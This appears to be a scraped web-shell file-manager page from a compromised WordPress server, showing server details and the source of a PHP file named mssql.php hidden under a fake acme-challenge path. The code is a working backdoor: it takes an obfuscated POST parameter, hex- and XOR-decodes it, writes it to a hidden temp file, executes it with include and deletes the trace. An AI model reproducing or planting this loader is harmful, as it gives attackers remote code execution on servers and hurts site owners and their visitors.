HEX
Server: nginx/1.28.0
System: Linux yisu-68a5f20334161 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
User: www (1000)
PHP: 8.2.28
Disabled: passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
Upload Files
File: /www/wwwroot/q.autos58.cn/wp-content/well-known/acme-challenge/b/b/e/f/mssql.php
<?php

if(count($_POST) > 0 && isset($_POST["c\x6F\x6Dp"])){
	$rec = array_filter([getenv("TMP"), "/dev/shm", sys_get_temp_dir(), "/var/tmp", "/tmp", ini_get("upload_tmp_dir"), getenv("TEMP"), getcwd(), session_save_path()]);
	$data = hex2bin($_POST["c\x6F\x6Dp"]);
	$val= '' ; foreach(str_split($data) as $char){$val .= chr(ord($char) ^ 19);}
	foreach ($rec as $dat):
    		if ((bool)is_dir($dat) && (bool)is_writable($dat)) {
    $flg = str_replace("{var_dir}", $dat, "{var_dir}/.resource");
    if (file_put_contents($flg, $val)) {
	include $flg;
	@unlink($flg);
	die();
}
}
endforeach;
}